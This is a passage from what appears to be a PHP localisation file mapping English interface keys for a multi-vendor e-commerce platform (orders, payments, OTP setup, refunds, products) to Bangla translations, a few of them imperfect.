প্রোফাইল', 'My_Address' => 'আমার ঠিকানা', 'My_Addresses' => 'আমার ঠিকানা', 'My_Bank_Info' => 'আমার ব্যাংক তথ্য', 'My_Compare_List' => 'আমার কম্পেয়ার তালিকা', 'My_Compare_list' => 'আমার কম্পেয়ার তালিকা', 'My_Inbox' => 'আমার ইনবক্স', 'My_Loyalty_Point' => 'আমার লয়াল্টি পয়েন্ট', 'My_Order' => 'আমার অর্ডার', 'My_Order_Details' => 'আমার অর্ডার ডিটেলস', 'My_Order_Details_Delivery_Man_Info' => 'আমার অর্ডার ডিটেলস ডেলিভারি মানুষের তথ্য', 'My_Order_Details_Seller_Info' => 'আমার অর্ডার ডিটেলস বিক্রেতার তথ্য', 'My_Order_Details_Track_Order' => 'আমার অর্ডার ডিটেলস ট্র্যাক অর্ডার', 'My_Order_List' => 'আমার অর্ডার তালিকা', 'My_Profile' => 'আমার প্রোফাইল', 'My_Shop' => 'আমার দোকান', 'My_Shopping_Cart' => 'আমার শপিং কার্ট', 'My_Support_Tickets' => 'আমার সাপোর্ট টিকিট', 'My_Wallet' => 'আমার ওয়ালেট ', 'My_Wish_List' => 'আমার উইশ লিস্ট', 'My_Wishlist' => 'আমার উইশ লিস্ট', 'My_Wishlists' => 'আমার উইশ লিস্ট', 'My_profile' => 'আমার প্রোফাইল', 'N/a' => 'এন/এ', 'N:B you_can_upload_only' => 'এন:বি আপনি কেবল আপলোড করতে পারেন', 'N:B you_can_upload_only_6Valleys_theme_templates' => 'এন:বি আপনি কেবল 6 ভ্যালির থিম টেম্পলেটগুলি আপলোড করতে পারেন', 'NB' => 'এনবি', 'NB : Keep an OTP variable in your SMS providers OTP Template' => 'এনবি: আপনার এসএমএস সরবরাহকারীদের ওটিপি টেমপ্লেটে একটি ওটিপি ভেরিয়েবল রাখুন', 'NB : XXXX will be replace with otp' => 'এনবি: xxxx ওটিপি দিয়ে প্রতিস্থাপন করা হবে', 'NB= _Image_size_must_be_within_2_MB' => 'এনবি=> চিত্রের আকার অবশ্যই 2 এমবি এর মধ্যে থাকতে হবে', 'NB_:_#OTP#_will_be_replace_with_otp' => 'এনবি: # ওটিপি # ওটিপি দিয়ে প্রতিস্থাপন করা হবে', 'NB_= _Keep_an_OTP_variable_in_your_SMS_providers_OTP_Template' => 'এনবি=> আপনার এসএমএস সরবরাহকারীদের ওটিপি টেম্পলেটটিতে একটি ওটিপি ভেরিয়েবল রাখুন', 'NB_= _XXXX_will_be_replace_with_otp' => 'এনবি=> xxxx ওটিপি দিয়ে প্রতিস্থাপন করা হবে', 'NEWS LETTER' => 'নিউজ লেটার', 'NID' => 'NID', 'Name' => 'নাম', 'Name your OAuth 2.0 client' => 'আপনার oauth 2.0 ক্লায়েন্টের নাম দিন', 'Nav menu' => 'নেভ মেনু', 'Negative' => 'নেতিবাচক', 'Network Components' => 'নেটওয়ার্ক উপাদান', 'Neutral' => 'নিরপেক্ষ', 'New' => 'নতুন', 'New Arrivals' => 'নতুন আগমন', 'New Currency inserted successfully!' => 'নতুন মুদ্রা সফলভাবে এড হয়েছে!', 'New Digital Product' => 'নতুন ডিজিটাল পণ্য', 'New Product' => 'নতুন পণ্য', 'New Request' => 'নতুন অনুরোধ', 'New delivery-man' => 'নতুন ডেলিভারি ম্যান', 'New notification' => 'নতুন নোটিফিকেশন', 'New order ID for you' => 'আপনার জন্য নতুন অর্ডার আইডি', 'New order received' => 'নতুন অর্ডার প্রাপ্ত', 'New_Arrivals' => 'নতুন আগমন', 'New_Seller' => 'নতুন বিক্রেতা', 'New_Sub_Sub_Category' => 'নতুন সাব সাব ক্যাটাগরি', 'Newsletter' => 'নিউজলেটার', 'Next' => 'পরবর্তী', 'No' => 'না', 'No Account' => 'কোন অ্যাকাউন্ট', 'No Data found' => 'কোনও ডেটা পাওয়া যায় নি', 'No Message available' => 'কোন মেসেজ এভেইল্যাবল না', 'No Product Found' => 'কোনও পণ্য পাওয়া যায় নি', 'No conversation found' => 'কোনও কথোপকথন পাওয়া যায় নি', 'No conversetion found' => 'কোনও রূপান্তর পাওয়া যায় নি', 'No data found' => 'কোনও ডেটা পাওয়া যায় নি', 'No data to show' => 'দেখানোর জন্য কোনও ডেটা নেই', 'No such data found!' => 'এরকম কোনও ডেটা পাওয়া যায়নি!', 'No_Discount' => 'ছাড় নেই', 'No_Featured_Product_Found' => 'কোনও ফীচার পণ্য পাওয়া যায় নি', 'No_Order_Found' => 'কোন অর্ডার পাওয়া যায় নি', 'No_Product_Found' => 'কোনও পণ্য পাওয়া যায় নি', 'No_country_to_deliver' => 'ডেলিভারি করার মতো কোনও দেশ নেই', 'No_data_found' => 'No data found', 'No_data_to_found' => 'কোনও ডেটা খুঁজে পাওয়া যায় না', 'No_data_to_show' => 'দেখানোর জন্য কোনও ডেটা নেই', 'No_featured_product_found' => 'কোনও ফীচার পণ্য পাওয়া যায় নি', 'No_matching_data_found' => 'কোনো মিলে যাওয়া ডেটা পাওয়া যায়নি', 'No_reply' => 'উত্তর নেই', 'Not_Seen_Yet' => 'এখনও দেখা যায় নি', 'Note' => 'বিঃদ্রঃ', 'Note about transaction or request' => 'ট্রান্সেকশন বা অনুরোধ সম্পর্কে নোট', 'Notification' => 'নোটিফিকেশন', 'Notification Update' => 'নোটিফিকেশন আপডেট', 'Notification mail for new order received' => 'নতুন অর্ডারের জন্য নোটিফিকেশন মেল প্রাপ্ত', 'Notification mail for order placed' => 'অর্ডার স্থাপনের জন্য নোটিফিকেশন মেইল', 'Notification_Table' => 'নোটিফিকেশন টেবিল', 'Now' => 'এখন', 'Now copy' => 'এখন অনুলিপি', 'Now go to' => 'এখন যেতে', 'Now your multi vendor business mode is opening you can add new seller !!' => 'এখন আপনার মাল্টি বিক্রেতা ব্যবসায়িক মোডটি খোলা আপনি নতুন বিক্রেতা যুক্ত করতে পারেন !!', 'Now_you_can_login' => 'এখন আপনি লগইন করতে পারেন', 'Number' => 'সংখ্যা', 'OAuth client ID' => 'Oauth ক্লায়েন্ট আইডি', 'OAuth_client_ID' => 'Oauth ক্লায়েন্ট আইডি', 'OFF' => 'বন্ধ', 'OK' => 'ঠিক আছে', 'ON' => 'চালু', 'OTP' => 'ওটিপি', 'OTP resend time' => 'ওটিপি পুনরুদ্ধার সময়', 'OTP_&_Login' => 'ওটিপি এন্ড লগইন', 'OTP_Verification' => 'ওটিপি ভেরিফিকেশন', 'OTP_and_Login_Setup' => 'ওটিপি এন্ড লগইন সেটআপ', 'OTP_and_login_setup' => 'ওটিপি এন্ড লগইন সেটআপ', 'OTP_has_been_sent_again.' => 'ওটিপি আবার প্রেরণ করা হয়েছে।', 'OTP_setup' => 'ওটিপি সেটআপ', 'OTP_verification' => 'ওটিপি ভেরিফিকেশন', 'OVERVIEW' => 'ওভারভিউ', 'Oder_Transaction_Statement' => 'ওডিআর ট্রান্সেকশন স্টেটমেন্ট', 'Of' => 'Of', 'Offers' => 'অফার', 'Offers_&_Deals' => 'অফার এন্ড ডিল', 'Office' => 'অফিস', 'Offline_Payments' => 'অফলাইন পেমেন্ট', 'Ofline_Payment_Methods' => 'লাইন পেমেন্ট পদ্ধতি', 'Ok let me check' => 'ঠিক আছে, আমাকে দেখতে দাও', 'Old' => 'পুরানো', 'Olga Sheppard' => 'ওলগা শেপার্ড', 'OnGoing' => 'চলমান', 'On_Vacation' => 'ছুটিতে', 'Once deleted you will not be able to recover this' => 'একবার মুছে ফেললে আপনি এটি পুনরুদ্ধার করতে এনাবল হবেন না', 'Once you have downloaded and filled the format file' => 'একবার আপনি ফর্ম্যাট ফাইলটি ডাউনলোড এন্ড পূরণ করেছেন', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'একবার আপনি ফর্ম্যাট ফাইলটি ডাউনলোড এন্ড পূরণ করার পরে এটি নীচের ফর্মটিতে আপলোড করুন এন্ড জমা দিন', 'Once_you_convert_the_point_into_money_then_it_won`t_back_to_point' => 'একবার আপনি পয়েন্টকে অর্থে রূপান্তর করেন তবে এটি আবার পয়েন্টে ফিরে আসে না', 'One Referrer Equal To How Much USD' => 'একজন রেফারার কত মার্কিন ডলার সমান', 'Ongoing_Orders' => 'চলমান অর্ডার', 'Online Shop' => 'অনলাইন দোকান', 'Online Shopping' => 'অনলাইনে কেনাকাটা', 'Online_Shopping' => 'অনলাইনে কেনাকাটা', 'Open' => 'খোলা', 'Open Your Store' => 'আপনার দোকান খুলুন', 'Open_Your_Store' => 'আপনার দোকান খুলুন', 'Open_your_and_start_selling.' => 'আপনার শপ খুলুন এন্ড বিক্রয় শুরু করুন।', 'Optional' => 'ঐচ্ছিক', 'Order' => 'অর্ডার', 'Order Complete' => 'অর্ডার কমপ্লিট', 'Order Confirmation Message' => 'অর্ডার নিশ্চিতকরণ মেসেজ', 'Order Delivered Message' => 'অর্ডার ডেলিভারি মেসেজ', 'Order Details' => 'অর্ডার ডিটেলস', 'Order Failed Message' => 'অর্ডার ফেইলড মেসেজ', 'Order ID' => 'অর্ডার আইডি', 'Order List' => 'অর্ডার তালিকা', 'Order No' => 'অর্ডার নং', 'Order Pending Message' => 'পেন্ডিং মেসেজ অর্ডার', 'Order Placed' => 'অর্ডার স্থাপন', 'Order Processing Message' => 'অর্ডার প্রসেসিং মেসেজ', 'Order Report' => 'অর্ডার রিপোর্ট', 'Order Returned Message' => 'অর্ডার রিটার্নড মেসেজ', 'Order Shipped' => 'অর্ডার শিপড', 'Order Statistics' => 'অর্ডার পরিসংখ্যান', 'Order Status' => 'অর্ডারের স্ট্যাটাস', 'Order Table' => 'অর্ডার টেবিল', 'Order Wise Shipping Method deleted successfully' => 'অর্ডার ওয়াইজ শিপিং পদ্ধতি সফলভাবে মুছে ফেলা', 'Order details' => 'অর্ডার ডিটেলস', 'Order is already delivered You can not change it' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়েছে আপনি এটি পরিবর্তন করতে পারবেন না', 'Order is already delivered You can not change it !!' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়েছে আপনি এটি পরিবর্তন করতে পারবেন না !!', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়েছে এন্ড ট্রান্সেকশন পরিমাণ ডেলিভারি করা হয়েছে পরিবর্তনের স্ট্যাটাস ভুল গণনা করার কারণ হতে পারে', 'Order out for delivery Message' => 'অর্ডার আউট ফর ডেলিভারি মেসেজ', 'Order placed' => 'অর্ডার স্থাপন', 'Order#' => 'অর্ডার#', 'Order_&_Shipping_Info' => 'অর্ডার এন্ড শিপিংয়ের তথ্য', 'Order_&_Shipping_Info ' => 'অর্ডার এন্ড শিপিংয়ের তথ্য', 'Order_Again' => 'আবার অর্ডার', 'Order_Amount' => 'অর্ডার পরিমাণ', 'Order_Complete' => 'সম্পূর্ণ অর্ডার', 'Order_Created_At' => 'অর্ডার তৈরি', 'Order_Date' => 'অর্ডারের তারিখ', 'Order_Delivered' => 'অর্ডার ডেলিভারি', 'Order_Details' => 'অর্ডার ডিটেলস', 'Order_ID' => 'অর্ডার আইডি', 'Order_Invoice' => 'প্রিন্ট অর্ডার', 'Order_Management' => 'নির্দেশ ব্যাবস্থাপনা', 'Order_Placed' => 'অর্ডার স্থাপন', 'Order_Received_Notify_Seller' => 'অর্ডার প্রাপ্তি অবহিত বিক্রেতা', 'Order_Report' => 'অর্ডার রিপোর্ট', 'Order_Settings' => 'অর্ডার সেটিংস', 'Order_Statistics' => 'অর্ডার পরিসংখ্যান', 'Order_Status' => 'অর্ডারের স্ট্যাটাস', 'Order_Summary' => 'অর্ডার সংক্ষিপ্তসার', 'Order_Transactions' => 'অর্ডার ট্রান্সেকশন', 'Order_Wise_Shipping_Method_deleted_successfully' => 'অর্ডার ওয়াইজ শিপিং পদ্ধতি সফলভাবে মুছে ফেলা হয়েছে', 'Order_cancelation_availablity' => 'অর্ডার ক্যান্সল্যাশন উপলভ্যতা', 'Order_delivered' => 'অর্ডার ডেলিভারি', 'Order_details_id' => 'অর্ডার ডিটেলস আইডি', 'Order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়েছে এন্ড ট্রান্সেকশন পরিমাণ ডেলিভারি করা হয়েছে পরিবর্তনের স্ট্যাটাস ভুল গণনা করার কারণ হতে পারে', 'Order_is_on_the_way' => 'অর্ডার চলছে', 'Order_list' => 'অর্ডার তালিকা', 'Order_placed' => 'অর্ডার স্থাপন', 'Ordered_Items' => 'অর্ডার করা আইটেম', 'Orders' => 'অর্ডার', 'Orders Served' => 'অর্ডার পরিবেশন', 'Other' => 'অন্য', 'Other s_Store' => 'অন্যান্য এস স্টোর', 'Others' => 'অন্যান্য', 'Others_Store' => 'অন্যরা ষ্টোর', 'Out_For_Delivery' => 'আউট ফর ডেলিভারি', 'Out_Of_Stock' => 'স্টক বাইরে', 'Out_of_Stock' => 'স্টক বাইরে', 'Out_of_Stock_Products' => 'স্টক পণ্য বাইরে', 'Out_of_stock' => 'স্টক বাইরে', 'Outdoor Fun & Sports' => 'আউটডোর মজা এন্ড ক্রীড়া', 'Overall' => 'সামগ্রিকভাবে', 'Overall Statistics' => 'সামগ্রিক পরিসংখ্যান', 'Overall_statistics' => 'সামগ্রিক পরিসংখ্যান', 'Overview' => 'ওভারভিউ', 'PAYMENT_METHOD' => 'মূল্যপরিশোধ পদ্ধতি', 'PAYMENT_METHODS' => 'মুল্য পরিশোধ পদ্ধতি', 'POS' => 'POS', 'POS Order List' => 'POS অর্ডার তালিকা', 'POS_Order' => 'POS Order', 'POS_Orders' => 'POS অর্ডার', 'POS_order' => 'POS অর্ডার', 'PURCHASE_CODE' => 'ক্রয় কোড', 'Packaging' => 'প্যাকেজিং', 'Packaging order' => 'প্যাকেজিং অর্ডার', 'Packaging_order' => 'প্যাকেজিং অর্ডার', 'Page Not found' => 'পৃষ্ঠা খুঁজে পাওয়া যায়নি', 'Pages_&_Media' => 'পৃষ্ঠা এন্ড মিডিয়া', 'Paid' => 'পেইড', 'Paid By' => 'পেমেন্ট দ্বারা পেমেন্ট', 'Paid Phone Number' => 'প্রদত্ত ফোন নম্বর', 'Paid_by' => 'পেমেন্ট দ্বারা পেমেন্ট', 'Partner request' => 'অংশীদার অনুরোধ', 'Password' => 'পাসওয়ার্ড', 'Password Reset' => 'পাসওয়ার্ড পুনরায় সেট করুন', 'Password doesn t Match' => 'পাসওয়ার্ড মেলে না', 'Password_Reset_Mail' => 'পাসওয়ার্ড পুনরায় সেট করুন মেল', 'Password_doesn t_Match' => 'পাসওয়ার্ড মেলে না', 'Passwords do not match' => 'পাসওয়ার্ড মিলছে না', 'Passwords match' => 'পাসওয়ার্ড মিলেছে', 'Passwords_do_not_match' => 'পাসওয়ার্ড মিলছে না', 'Passwords_match' => 'আমি আজ খুশি', 'Pay_with_secure_Digital_payment_gateways' => 'সুরক্ষিত ডিজিটাল পেমেন্ট গেটওয়ে দিয়ে অর্থ পেমেন্ট করুন', 'Payer Name' => 'পেমেন্টকারীর নাম', 'Payment' => 'অর্থ পেমেন্ট', 'Payment Method' => 'মূল্যপরিশোধ পদ্ধতি', 'Payment Setup' => 'পেমেন্ট সেটআপ', 'Payment Statistics' => 'অর্থ পেমেন্ট পরিসংখ্যান', 'Payment Status' => 'পেমেন্ট স্ট্যাটাস', 'Payment_Details' => 'পেমেন্ট ডিটেলস', 'Payment_History' => 'অর্থ পেমেন্ট ইতিহাস', 'Payment_Information' => 'পেমেন্ট তথ্য', 'Payment_Method' => 'মূল্যপরিশোধ পদ্ধতি', 'Payment_Methods' => 'মুল্য পরিশোধ পদ্ধতি', 'Payment_Note' => 'পেমেন্ট নোট', 'Payment_Option' => 'পেমেন্ট অপশন', 'Payment_Statistics' => 'অর্থ পেমেন্ট পরিসংখ্যান', 'Payment_Status' => 'পেমেন্ট স্ট্যাটাস', 'Payments' => 'অর্থ পেমেন্ট', 'Payments Amount' => 'পেমেন্টের পরিমাণ', 'Paypal' => 'পেপাল', 'Paypal_Client_ID' => 'পেপাল ক্লায়েন্ট আইডি', 'Pending' => 'পেন্ডিং', 'Pending Request' => 'অনুরোধ অপেক্ষামান', 'Pending Withdraws' => 'পেন্ডিং উইথড্র', 'Pending_Products' => 'পেন্ডিং পণ্য', 'Pending_Refund_Requests' => 'পেন্ডিং রিফান্ডের অনুরোধগুলি', 'Pending_Withdraw' => 'পেন্ডিং উইথড্র', 'Pending_Withdraws' => 'পেন্ডিং উইথড্র', 'Percent' => 'শতাংশ', 'Permanent' => 'স্থায়ী', 'Personal_Details' => 'ব্যক্তিগত ডিটেলস', 'Phone' => 'ফোন', 'Phone Case' => 'ফোন কেস', 'Phones & Telecom' => 'ফোন এন্ড টেলিকম', 'Physical Product' => 'ফিজিক্যাল পণ্য', 'Pinterest' => 'Pinterest', 'Place_Order' => 'অর্ডার রাখুন', 'Placeholder' => 'স্থানধারক', 'Please ReType Password' => 'দয়া করে পাসওয়ার্ড পুনরায় টাইপ করুন', 'Please check the recaptcha' => 'দয়া করে রেকাপ্টচা চেক করুন', 'Please choose all the options' => 'সমস্ত বিকল্প পছন্দ করুন', 'Please enter valid email address' => 'ভ্যালিড ইমেইল ঠিকানা লিখুন', 'Please enter your first name' => 'দয়া করে, আপনার প্রথম নাম লিখুন', 'Please enter your last name' => 'আপনার নামের শেষ অংশ লিখুন', 'Please enter your phone number' => 'অনুগ্রহ করে আপনার ফোন নাম্বারটি প্রদান করুন', 'Please fill all required fields' => 'দয়া করে সমস্ত প্রয়োজনীয় ক্ষেত্রগুলি পূরণ করুন', 'Please fill all required fields of shipping address' => 'শিপিং ঠিকানার সমস্ত প্রয়োজনীয় ক্ষেত্রগুলি পূরণ করুন', 'Please fill all required fields of shipping/billing address' => 'শিপিং/বিলিং ঠিকানার সমস্ত প্রয়োজনীয় ক্ষেত্রগুলি পূরণ করুন', 'Please go back to the homepage' => 'দয়া করে হোমপেজে ফিরে যান', 'Please only input png or jpg type file' => 'দয়া করে কেবল পিএনজি বা জেপিজি টাইপ ফাইল ইনপুট করুন', 'Please provide valid email address' => 'ভ্যালিড ইমেল ঠিকানা সরবরাহ করুন', 'Please write the message' => 'মেসেজ লিখুন দয়া করে', 'Please_ReType_Password' => 'দয়া করে পাসওয়ার্ড পুনরায় টাইপ করুন', 'Please_Verify_that_its_you' => 'দয়া করে যাচাই করুন যে এটি আপনি', 'Please_check_the_recaptcha' => 'দয়া করে রেকাপ্টচা চেক করুন', 'Please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'আপনার ব্যাংক অ্যাকাউন্টের মাধ্যমে অর্থ পেমেন্ট জন্য আপনার যাচাই করা অ্যাকাউন্টটি নিশ্চিত করুন', 'Please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'আপনার বেতন নিশ্চিত করতে এন্ড আপনার অর্ডার পেতে দয়া করে ডেলিভারিম্যানের সাথে যোগাযোগ করুন।', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_email' => 'আপনার ইমেল যাচাই করতে দয়া করে নীচের ক্ষেত্রের ওটিপি প্রদান করুন', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_phone' => 'আপনার ফোন যাচাই করতে দয়া করে নীচের ক্ষেত্রের ওটিপি প্রদান করুন', 'Please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'দয়া করে, নিশ্চিত করুন যে সমস্ত পণ্য সরবরাহের চার্জ আপ টু ডেট রয়েছে।', 'Please_send_a_Feedback' => 'একটি প্রতিক্রিয়া প্রেরণ করুন', 'Please_type_verify_code' => 'দয়া করে যাচাই করা কোড টাইপ করুন', 'Plese come back later' => 'প্লিজ পরে ফিরে আসুন', 'Point_Transaction_History' => 'পয়েন্ট ট্রান্সেকশন ইতিহাস', 'Poor' => 'পুওর', 'Popular_Tags' => 'জনপ্রিয় ট্যাগ', 'Popup Banner' => 'পপআপ ব্যানার', 'Popup_Banner' => 'পপআপ ব্যানার', 'Popup_Banner_updated_Successfully' => 'পপআপ ব্যানার সফলভাবে আপডেট হয়েছে', 'Portable Air Conditioner' => 'পোর্টেবল এয়ার কন্ডিশনার', 'Position' => 'পজিশন', 'Positive' => 'ইতিবাচক', 'Positive_Review' => 'ইতিবাচক রিভিউ', 'Power supply unit' => 'বিদ্যুৎ সরবরাহ ইউনিট', 'Preparing Shipment' => 'প্রিন্ট প্রস্তুত করা', 'Preparing_for_shipment' => 'বদলির জন্য প্রস্তুতি', 'Press' => 'প্রেস', 'Press_Submit' => 'জমা দিন', 'Previous' => 'আগে', 'Price' => 'দাম', 'Price_Range' => 'মূল্য পরিসীমা', 'Pricing_&_others' => 'মূল্য এন্ড অন্যান্য', 'Primary' => 'প্রাথমিক', 'Primary_Color' => 'মৌলিক রঙ', 'Primary_Light_Color' => 'প্রাথমিক হালকা রঙ', 'Print' => 'ছাপা', 'Print Invoice' => 'প্রিন্ট ইনভয়েস', 'Print invoice' => 'প্রিন্ট ইনভয়েস', 'Printer' => 'প্রিন্টার', 'Priority' => 'অগ্রাধিকার', 'Privacy Policy' => 'প্রাইভেসি পলিসি', 'Privacy policy' => 'প্রাইভেসি পলিসি', 'Privacy_Policy' => 'প্রাইভেসি পলিসি', 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported' => 'প্রো প্লাস 32 ইঞ্চি অ্যান্ড্রয়েড স্মার্ট ওয়াইফাই এইচডি এলইডি টিভি 4 কে সমর্থিত', 'Proceed_To_Checkout' => 'চেকআউট এগিয়ে যান', 'Proceed_To_Next' => 'পরবর্তী দিকে এগিয়ে যান', 'Proceed_to_Next' => 'পরবর্তী দিকে এগিয়ে যান', 'Processing' => 'প্রসেসিং', 'Proddduct 2' => 'প্রোডডাক্ট 2', 'Product' => 'পণ্য', 'Product Add' => 'পণ্য অ্যাড', 'Product Brand on/off' => 'পণ্য ব্র্যান্ড চালু/বন্ধ', 'Product Bulk Import' => 'পণ্য বাল্ক আমদানি', 'Product Discount' => 'পণ্য ছাড়', 'Product Edit' => 'পণ্য এডিট ', 'Product ID is required!' => 'পণ্য আইডি প্রয়োজন!', 'Product Image' => 'পণ্যের ছবি', 'Product List' => 'পণ্য তালিকা', 'Product Name' => 'পণ্যের নাম', 'Product Preview' => 'পণ্য পূর্বরূপ', 'Product Report' => 'পণ্য প্রতিবেদন', 'Product Review' => 'পণ্য রিভিউ', 'Product Successfully Returned' => 'পণ্য সফলভাবে ফিরে এসেছে', 'Product Type' => 'পণ্যের ধরন', 'Product Unit Price' => 'পণ্য ইউনিট মূল্য', 'Product added successfully!' => 'পণ্য সফলভাবে যুক্ত!', 'Product already added in cart' => 'পণ্য ইতিমধ্যে কার্টে যুক্ত', 'Product already added to wishlist' => 'পণ্য ইতিমধ্যে উইশ লিস্টয় যুক্ত হয়েছে', 'Product has been added to wishlist' => 'পণ্যটি উইশ লিস্টতে যুক্ত করা হয়েছে', 'Product images is required!' => 'পণ্য চিত্র প্রয়োজন!', 'Product in Wishlist Report' => 'উইশ লিস্ট প্রতিবেদনে পণ্য', 'Product in wishlist report' => 'উইশ লিস্ট প্রতিবেদনে পণ্য', 'Product name is required!' => 'পণ্যের নাম প্রয়োজন!', 'Product price & stock' => 'পণ্য মূল্য এন্ড স্টক', 'Product reviews' => 'পণ্য রিভিউ', 'Product stock Report' => 'পণ্য স্টক রিপোর্ট', 'Product stock report' => 'পণ্য স্টক রিপোর্ট', 'Product thumbnail is required!' => 'পণ্য থাম্বনেইল প্রয়োজন!', 'Product_Attributes' => 'পণ্য এট্রিবিউট', 'Product_Brand' => 'পণ্য ব্র্যান্ড', 'Product_Comparison' => 'পণ্য কম্পেয়ার', 'Product_Details' => 'পণ্যের ডিটেলস', 'Product_Discount' => 'পণ্য ছাড়', 'Product_List' => 'পণ্য তালিকা', 'Product_List_Page' => 'পণ্য তালিকা পৃষ্ঠা', 'Product_Management' => 'পণ্য ব্যবস্থাপনা', 'Product_Name' => 'পণ্যের নাম', 'Product_Report' => 'পণ্য প্রতিবেদন', 'Product_Section' => 'পণ্য ক্যাটাগরি', 'Product_Statistics' => 'পণ্য পরিসংখ্যান', 'Product_Stock' => 'পণ্য স্টক', 'Product_Successfully_Returned' => 'পণ্য সফলভাবে ফিরে এসেছে', 'Product_Unit_Price' => 'পণ্য ইউনিট মূল্য', 'Product_has_been_added_to_Compare_list' => 'কম্পেয়ার তালিকার জন্য পণ্য যুক্ত করা হয়েছে', 'Product_list' => 'প্রোডাক্ট তালিকা', 'Product_must_be_approved' => 'পণ্য অবশ্যই অনুমোদিত হতে হবে', 'Product_not_uploaded_yet' => 'পণ্য এখনও আপলোড হয়নি', 'Product_price_&_stock' => 'পণ্য মূল্য এন্ড স্টক', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'পণ্যের পরিমাণ কার্টে শূন্য বা শূন্যের চেয়ে কম হতে পারে না', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart!' => 'পণ্যের পরিমাণ কার্টে শূন্য বা শূন্যের চেয়ে কম হতে পারে না!', 'Product_quantity_updated' => 'পণ্যের পরিমাণ আপডেট হয়েছে', 'Product_quantity_updated!' => 'পণ্যের পরিমাণ আপডেট হয়েছে!', 'Product_review_not_available' => 'পণ্য রিভিউ এভেইল্যাবলে নয়', 'Product_reviews' => 'পণ্য রিভিউ', 'Products' => 'পণ্য', 'Products_Stock' => 'পণ্য স্টক', 'Profile' => 'প্রোফাইল', 'Profile Settings' => 'প্রোফাইল সেটিংস', 'Profile_Image' => 'প্রোফাইল ছবি', 'Profile_Info' => 'প্রোফাইল তথ্য', 'Promo_Code' => 'প্রচার কোড', 'Promotion_Management' => 'প্রচার ব্যবস্থাপনা', 'Promotional_Banners' => 'প্রচারমূলক ব্যানার', 'Provide' => 'সরবরাহ করুন', 'Provide Primary Email and press' => 'প্রাথমিক ইমেল এন্ড প্রেস', 'Published' => 'প্রকাশিত', 'Purchase' => 'ক্রয়', 'Purchase price' => 'ক্রয় মূল্য', 'Purchase_price' => 'ক্রয় মূল্য', 'Purchese price' => 'দাম কিনে', 'Push Messages' => 'পুশ মেসেজ', 'Push Notification Setup' => 'নোটিফিকেশন সেটআপ পুশ করুন', 'Push a description and also identifier and Continue' => 'একটি ডিটেলস চাপুন এন্ড সনাক্তকারী এন্ড চালিয়ে যান', 'Push_Notification' => 'পুশ নোটিফিকেশন', 'Push_Notification_Setup' => 'নোটিফিকেশন সেটআপ পুশ করুন', 'Put a description and also identifier (identifier that used for app) and this is the' => 'একটি বর্ণনা রাখুন এন্ড সনাক্তকারী (আইডেন্টিফায়ার যা অ্যাপের জন্য ব্যবহৃত) এন্ড এটি হল', 'Q' => 'প্রশ্ন', 'QTY' => 'পরিমান', 'Qty' => 'পরিমান', 'Quantity' => 'পরিমাণ', 'Question' => 'প্রশ্ন', 'Quick' => 'দ্রুত', 'Quick_Links' => 'দ্রুত লিঙ্ক', 'Quick_View' => 'তারাতারি দেখা', 'REVIEWS' => 'রিভিউ', 'RTL' => 'আরটিএল', 'Ranking' => 'র্যাঙ্কিং', 'Rating' => 'রেটিং', 'Ratings' => 'রেটিং', 'Ratio' => 'অনুপাত', 'Ratio_1:1' => 'অনুপাত 1:1', 'Re-Order_Level' => 'পুনর্বিন্যাস লেভেল', 'ReCAPTCHA Failed' => 'Recaptcha ব্যর্থ', 'ReCAPTCHA_Failed' => 'Recaptcha ব্যর্থ', 'Reached maximum' => 'সর্বাধিক পৌঁছেছে', 'Ready After Sell' => 'বিক্রয় পরে প্রস্তুত', 'Ready Product' => 'প্রস্তুত পণ্য', 'Ready to Leave' => 'ত্যাগ করতে প্রস্তুত', 'Ready_After_Sell' => 'বিক্রয় পরে প্রস্তুত', 'Ready_Product' => 'প্রস্তুত পণ্য', 'Recaptcha' => 'Recaptcha', 'Recommended' => 'প্রস্তাবিত', 'Recommended_For_You' => 'আপনার জন্য প্রস্তাবিত', 'Recommended_for_You' => 'আপনার জন্য প্রস্তাবিত', 'Redirecting_to_the_payment' => 'অর্থ পেমেন্ট পুনর্নির্দেশ', 'Redirecting_to_the_payment_page' => 'পেমেন্ট পৃষ্ঠায় পুনঃনির্দেশ', 'Refer_&_Earn' => 'রেফার এন্ড উপার্জন করুন', 'Refer_Code' => 'কোড উল্লেখ করুন', 'Reference' => 'রেফারেন্স', 'Refrigerator' => 'রেফ্রিজারেটর', 'Refund' => 'রিফান্ড', 'Refund Details' => 'রিফান্ডের ডিটেলস', 'Refund Given' => 'রিফান্ড দেওয়া হয়েছে', 'Refund Policy' => 'রিফান্ড পলিসি', 'Refund Rate' => 'রিফান্ড হার', 'Refund request' => 'টাকা রিফান্ড অনুরোধ', 'Refund_Details' => 'রিফান্ডের ডিটেলস', 'Refund_Given' => 'রিফান্ড দেওয়া হয়েছে', 'Refund_Order_Validity' => 'রিফান্ড অর্ডার ভ্যালিডিটি', 'Refund_Policy' => 'রিফান্ড পলিসি', 'Refund_Request' => 'টাকা রিফান্ড অনুরোধ', 'Refund_Request_List' => 'রিফান্ডের অনুরোধ তালিকা', 'Refund_Requests' => 'রিফান্ড অনুরোধ', 'Refund_Transactions' => 'রিফান্ড ট্রান্সেকশন', 'Refund_reason' => 'রিফান্ড কারণ', 'Register' => 'নিবন্ধন', 'Rejected' => 'প্রত্যাখ্যাত', 'Remove' => 'অপসারণ', 'Remove_All' => 'সব মুছে ফেলুন', 'Removed' => 'সরানো হয়েছে', 'Reorder' => 'পুনরায় অর্ডার', 'Repeat' => 'পুনরাবৃত্তি', 'Reply_from_admin' => 'অ্যাডমিন থেকে উত্তর', 'Report' => 'রিপোর্ট', 'Report_&_Analytics' => 'রিপোর্ট এন্ড বিশ্লেষণ', 'Reports' => 